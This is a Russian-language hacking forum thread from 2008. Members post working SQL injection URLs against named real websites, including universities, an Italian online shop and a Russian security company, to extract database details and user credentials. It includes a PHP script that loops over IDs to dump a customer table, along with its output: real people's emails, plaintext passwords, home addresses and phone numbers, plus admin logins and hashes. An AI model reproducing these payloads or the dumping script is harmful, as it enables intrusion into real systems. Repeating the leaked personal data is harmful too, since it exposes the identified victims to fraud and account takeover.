Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.10.2008, 10:19
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Сообщение от SVAROG
5.0.45-log
А дальше?
Код:
http://www.remhq.com/news_story.php?id=-894'+union+select+1,concat_ws(username,0x3a,password,0x3a,accesslevel),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+hero_users+limit+0,1/*
|
|
|
30.10.2008, 11:06
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
исключительно .edu
Lake Superior State University
Код:
http://www.lssu.edu/degrees/degree.php?id=-5066+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+29,1/*
PR=7
5.0.20
-------------------------------------------------------------------
National Center for Supercomputing Applications at the University of Illinois(во как!)
Код:
http://www.ncsa.uiuc.edu/AboutUs/People/contact.php?id=-1000+union+select+1,version(),3,4,5,6,7,8,9,10/*
PR=7
5.0.45-log 3
пути:
Код:
/afs/ncsa.uiuc.edu/web/www-2006/site/htdocs/AboutUs/People/mailto_func.php
-------------------------------------------------------------------
University of Pennsylvania
Код:
http://asam.sas.upenn.edu/detail.php?id=-861+union+select+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11--
PR=7
4.1.15-standard
пути:
Код:
/var/www/ASAM/detail.php
|
|
|
|
30.10.2008, 13:11
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
prontospesa.it
средних размеров онлайн шоп
Код:
http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646
таблицы:
Код:
DM-Reward
DM-Target-Campagna
DM-Campagne
ReachKeyGenerale
dtproperties
Acquisti
Acquisto
CAP
Carrelli
Carrello
Commessi
Config
CostiConsegna
CRM
ECommerce
ECommerce1
ECommerce3
IVA
ListaPersonale
MailAccount
Offerta
Offerte
Operatori
ReachKey
Risultati
SenzaEAN
Supermarket
SuperMarket_Cat
Supermarket0
sysconstraints
syssegments
ToDo
Utenti
Utenti_OnLine
кто не ленивый может найдет где нить там кт  Мне лично лень 
Вытягиваем из таблицы Utenti - email+pass+всякая кадабра типа адреса:
Код:
http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646%27+OR+1=(select+top+1+cast(IdUtente+as%20nvarchar)%2B%27%3A%27%2Bcast(EMail+as%20nvarchar)%2B%27%3A%27%2Bcast(Password+as%20nvarchar)%2B%27%3A%27%2Bcast(Stato+as%20nvarchar)%2B%27%3A%27%2Bcast(Nome+as%20nvarchar)%2B%27%3A%27%2Bcast(Cognome+as%20nvarchar)%2B%27%3A%27%2Bcast(RagioneSociale+as%20nvarchar)%2B%27%3A%27%2Bcast(Indirizzo+as%20nvarchar)%2B%27%3A%27%2Bcast(Citta+as%20nvarchar)%2B%27%3A%27%2Bcast(Cap+as%20nvarchar)%2B%27%3A%27%2Bcast(Provincia+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono1+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono2+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono3+as%20nvarchar)+from+Utenti+where+IdUtente=1)--
скрипт на Php для дампинга таблицы Utenti
PHP код:
<?
set_time_limit(0);
function send_get($get_url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $get_url);
curl_setopt($ch,CURLOPT_COOKIEFILE,"./htdocs/1.txt");
curl_setopt($ch, CURLOPT_HEADER,0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,30);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
return $data = curl_exec($ch);
}
$postfix = 0;
$filename = "base".$postfix.".txt";
$desp = fopen ($filename,"a+");
for ($id=0;$id<30000;$id++){
$get_url="http://prontospesa.it/myclub/lista/_aggiungi.asp?C=2646%27+OR+1=(select+top+1+cast(IdUtente+as%20nvarchar)%2B%27%3A%27%2Bcast(EMail+as%20nvarchar)%2B%27%3A%27%2Bcast(Password+as%20nvarchar)%2B%27%3A%27%2Bcast(Stato+as%20nvarchar)%2B%27%3A%27%2Bcast(Nome+as%20nvarchar)%2B%27%3A%27%2Bcast(Cognome+as%20nvarchar)%2B%27%3A%27%2Bcast(RagioneSociale+as%20nvarchar)%2B%27%3A%27%2Bcast(Indirizzo+as%20nvarchar)%2B%27%3A%27%2Bcast(Citta+as%20nvarchar)%2B%27%3A%27%2Bcast(Cap+as%20nvarchar)%2B%27%3A%27%2Bcast(Provincia+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono1+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono2+as%20nvarchar)%2B%27%3A%27%2Bcast(Telefono3+as%20nvarchar)+from+Utenti+where+IdUtente=".$id.")--";
$str=send_get($get_url);
if (preg_match("/nvarchar\040'(.*)'\040in\040una\040colonna/",$str,$matches)) {
echo $matches[1];
fputs($desp,$matches[1]);
fputs($desp,"\n");
}
}
fclose($desp);
?>
Вотс чего получаем на выходе :
Код:
1:elena.abba@dmgroup.it:fabio:1:Elena:Abbà::Via BOVE 14:Torino:10129:TO:011 5097327::
3:abbena@dm.unito.it:micoledo:1:Elsa:Abbena::S.da della bocchetta11:Sciolze:10090:TO:011 9603558::
9:matteo.adinolfi@tele2.it:grages64:1:Matteo:Adinolfi::C.so Corsica 45/C:Torino:10135:TO:0113170570::3290848091
12:loaffat@tin.it:nilde:1:Nilde:Affatato::strada del Drosso 140/D:Torino:10135:TO:0113472847::3335336138
|
|
|
|
30.10.2008, 16:03
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
http://shariki.com/news/?id=-1{SQLINJ}
Database Version: 5.0.67-log
Database name: u58240
User name: u58240@10.10.223.217
|
|
|
|
30.10.2008, 18:34
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
Код:
http://www.adultfyi.com/read.php?ID=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
4.1.22-log:adultfyi:adultfyi@localhost
Код:
http://www.yesilyurtlar.com.tr/en/urun.php?id=-1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
4.1.20:yesilyurtlar_en:yesilyurtlar@localhost
|
|
|
|
31.10.2008, 12:37
|
|
Banned
Регистрация: 02.01.2008
Сообщений: 195
Провел на форуме:
523549
Репутация:
301
|
|
Код:
http://www.webhoster4u.de/server.php?id=-132+union+all+select+database(),version()--
4.1.22-standard |
|
|
|
01.11.2008, 00:02
|
|
Новичок
Регистрация: 30.10.2008
Сообщений: 12
Провел на форуме:
24552
Репутация:
17
|
|
Pr4
Код:
http://www.thenaturenetwork.net/news/news.php?news_id=-1+union+select+1,2,3,4,5,concat_ws(0xb,version(),user(),database()),7,8,9,10,11,12,13,14,15,16--
вот таблицы с колонками:
http://tables-columns.narod.ru/thenaturenetwork.net.txt
|
|
|
|
01.11.2008, 01:07
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036
Репутация:
1334
|
|
http://www.icehw.net/article.php?id=...,13,14,15,16--
version: 5.0.22-Debian_0ubuntu6.06.3-log
user: icehw@localhost
database: icehw_main
table: login
Concat_ws(0x3a,ID,username,PASSWORD)
http://www.eajc.org/analytics_show_r.php?id=-27+union+select+1,2,3,4,5,concat_ws(0x3a,user_id,n ame,pass),7,8,9+from+adbm_user--
admin:1d1ac3f687c1572b5654e3fbd502a7c9
http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat(username,0x3a3a,pass)+from+u sers+limit+2,1--
login:brianficek
pass:85688717ef4fab9
|
|
|
|
01.11.2008, 02:01
|
|
Познающий
Регистрация: 22.09.2007
Сообщений: 42
Провел на форуме:
255505
Репутация:
22
|
|
НОВЫЕ ТЕХНОЛОГИИ ЗАЩИТЫ ИНФОРМАЦИИ-7000
Яндекс тИЦ 240
Google Page Rank 5
Код:
http://7000.ru/produce/details3.php?prod_id=470&id=-1+union+select+version(),2,3,4
version() 5.0.51a
user() w7000@localhost
database() w7000
Код:
7000_news
1. id
2. news_text
3. news_date
4. mode1
5. mode2
6. news_link
7. news_title
7000_stuff_messages
1. id
2. section
3. date
4. login
5. parent
6. topic
7. message
8. made
9. city
10. type
11. quality
12. price
13. seen
7000_stuff_sections
1. id
2. title
7000_stuff_users
1. id
2. login
3. password
4. email
5. address
6. occupation
7. homepage
8. interests
9. icq
10. sendnews
@x0Elvarc
1. id
2. title
TCat
1. id
2. title
3. id_cat
4. pos
banner_buys
1. id
2. bid
3. sid
4. uid
5. ip
6. crt
7. extra
banner_click
1. id
2. bid
3. ip
4. crt
5. sid
6. zoneid
banner_content
1. id
2. path
3. btype
4. header
5. crt
6. url
banner_main
1. id
2. zoneid
3. crt
4. shows
5. bansrc
6. on_off
7. frequency
banner_sessions
1. id
2. sid
3. ip
4. crt
banner_sites
1. id
2. description
3. url
banner_source
1. id
2. sizev
3. sizeh
4. type
banner_user
1. id
2. bid
3. crt
4. uid
5. bansid
6. shows
banner_zones
1. id
2. siteid
3. width
4. on_off
5. description
banscanusers
1. id
2. name
3. mail
4. www
5. phone
6. ip
7. login
8. pass
cat
1. id
2. name
3. text
4. rz
5. vis
6. konfig
7. pos
8. ismain
9. textmain
10. photomain
catalog
1. id
2. parent_id
3. is_section
4. title
5. price
categbd
1. number
2. cat
categbd1
1. nomer
2. name
3. subcat
4. dateadd
5. lang
6. homepage
7. ratadm
8. ratusr
9. download
10. url
11. description
далее уже влом искать что-то.... |
|
|
|
01.11.2008, 08:40
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Сообщение от lastsmile
далее уже влом искать что-то....
А че там дальше то копать?
Пошли юзвери:
Код:
http://7000.ru/produce/details3.php?prod_id=470&id=-1+union+select+concat_ws(login,0x3a,password),2,3,4+from+7000_stuff_users+limit+01--
Пассы в открытом виде
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
